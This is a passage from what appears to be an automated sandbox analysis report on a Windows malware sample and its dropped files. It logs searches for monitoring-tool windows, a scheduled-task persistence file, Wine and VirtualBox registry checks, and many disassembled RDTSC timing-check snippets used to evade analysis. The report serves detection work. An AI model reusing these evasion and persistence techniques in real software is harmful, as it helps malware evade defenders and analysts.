Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\Documents\JJECFIECBG.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_6C9C55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_6C9C55F0

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138238A second address: 1382390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136E999 second address: 136E9BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB1C8B21D45h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1381455 second address: 1381483 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8D0EF72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB1C8D0EF76h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1381483 second address: 1381490 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1381490 second address: 13814A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jp 00007FB1C8D0EF66h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13817A2 second address: 13817A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1381CBE second address: 1381CDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8D0EF70h 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FB1C8D0EF66h 0x0000000f js 00007FB1C8D0EF66h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13834C5 second address: 13834CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13835B7 second address: 13835F8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c popad 0x0000000d add dword ptr [esp], 39698BF4h 0x00000014 mov dh, ah 0x00000016 lea ebx, dword ptr [ebp+1244743Eh] 0x0000001c ja 00007FB1C8D0EF6Bh 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 jmp 00007FB1C8D0EF71h 0x0000002c popad 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13835F8 second address: 1383609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB1C8B21D36h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1383609 second address: 1383625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB1C8D0EF75h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1383625 second address: 1383629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13836F7 second address: 138371D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB1C8D0EF6Ch 0x00000008 jl 00007FB1C8D0EF66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FB1C8D0EF6Bh 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138371D second address: 1383798 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB1C8B21D3Ch 0x0000000b popad 0x0000000c pop eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FB1C8B21D38h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push 00000003h 0x00000029 mov dx, ax 0x0000002c add dword ptr [ebp+122D2B50h], edx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007FB1C8B21D38h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e movsx esi, si 0x00000051 mov si, 23C2h 0x00000055 add edx, dword ptr [ebp+122D22F7h] 0x0000005b push 00000003h 0x0000005d movsx edx, ax 0x00000060 push FDBD168Ch 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 push esi 0x0000006a pop esi 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1383798 second address: 138379E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138379E second address: 13837E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 3DBD168Ch 0x00000010 mov ecx, dword ptr [ebp+122D395Eh] 0x00000016 lea ebx, dword ptr [ebp+12447447h] 0x0000001c mov edi, 25D8F87Ch 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FB1C8B21D42h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13837E8 second address: 13837ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A28CC second address: 13A28D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A28D0 second address: 13A290F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FB1C8D0EF6Dh 0x0000000c pop ebx 0x0000000d pushad 0x0000000e jmp 00007FB1C8D0EF78h 0x00000013 jmp 00007FB1C8D0EF6Fh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A290F second address: 13A2919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A2919 second address: 13A2928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FB1C8D0EF66h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A2D59 second address: 13A2D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A2D5D second address: 13A2D71 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB1C8D0EF6Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A2D71 second address: 13A2D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A3159 second address: 13A3164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB1C8D0EF66h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A3164 second address: 13A3169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A3169 second address: 13A3180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FB1C8D0EF6Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A3745 second address: 13A3768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1C8B21D3Ah 0x00000009 jmp 00007FB1C8B21D41h 0x0000000e popad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A3768 second address: 13A376E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A376E second address: 13A3773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A3773 second address: 13A3784 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB1C8D0EF6Ah 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1378CC7 second address: 1378CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1378CCB second address: 1378CE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8D0EF74h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A91CE second address: 13A91D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A91D2 second address: 13A91D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B0189 second address: 13B0193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB1C8B21D36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B046B second address: 13B0477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FB1C8D0EF66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B08AA second address: 13B08C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1C8B21D44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B08C2 second address: 13B0902 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8D0EF6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FB1C8D0EF76h 0x0000000f jmp 00007FB1C8D0EF6Fh 0x00000014 popad 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 pushad 0x00000019 popad 0x0000001a push esi 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B0A10 second address: 13B0A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B0A14 second address: 13B0A2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FB1C8D0EF68h 0x0000000c pushad 0x0000000d jo 00007FB1C8D0EF66h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B4218 second address: 13B421D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B46C0 second address: 13B46C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B46C4 second address: 13B46C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B481B second address: 13B4821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B4821 second address: 13B4825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B49E3 second address: 13B49ED instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB1C8D0EF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B49ED second address: 13B49F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B4F3D second address: 13B4F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B4F43 second address: 13B4F6C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB1C8B21D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebx 0x0000000d mov edi, dword ptr [ebp+122D3B12h] 0x00000013 nop 0x00000014 pushad 0x00000015 jmp 00007FB1C8B21D3Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c jnl 00007FB1C8B21D36h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B4F6C second address: 13B4F79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B5125 second address: 13B5129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B53C9 second address: 13B53CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B6484 second address: 13B648A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B62A0 second address: 13B62A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B648A second address: 13B64AC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FB1C8B21D47h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B64AC second address: 13B64B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB1C8D0EF66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B75CD second address: 13B75DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B75DD second address: 13B75E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B75E3 second address: 13B75E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B80AD second address: 13B80B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B7E4F second address: 13B7E55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B961D second address: 13B9622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BA214 second address: 13BA25F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FB1C8B21D38h 0x0000000c popad 0x0000000d nop 0x0000000e mov di, bx 0x00000011 push 00000000h 0x00000013 or esi, 1BA4C883h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007FB1C8B21D38h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 push eax 0x00000036 pushad 0x00000037 je 00007FB1C8B21D3Ch 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BACD7 second address: 13BACDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BACDD second address: 13BAD65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c or si, CE17h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FB1C8B21D38h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FB1C8B21D38h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 jmp 00007FB1C8B21D46h 0x0000004e mov esi, 714AB19Dh 0x00000053 xchg eax, ebx 0x00000054 push eax 0x00000055 push edx 0x00000056 js 00007FB1C8B21D38h 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BD1F7 second address: 13BD1FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BB4A5 second address: 13BB4CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FB1C8B21D49h 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FB1C8B21D36h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BD1FC second address: 13BD20A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BD20A second address: 13BD210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BD210 second address: 13BD214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BD214 second address: 13BD218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BE65B second address: 13BE65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BE7EC second address: 13BE7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BF94C second address: 13BF952 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BF952 second address: 13BF956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
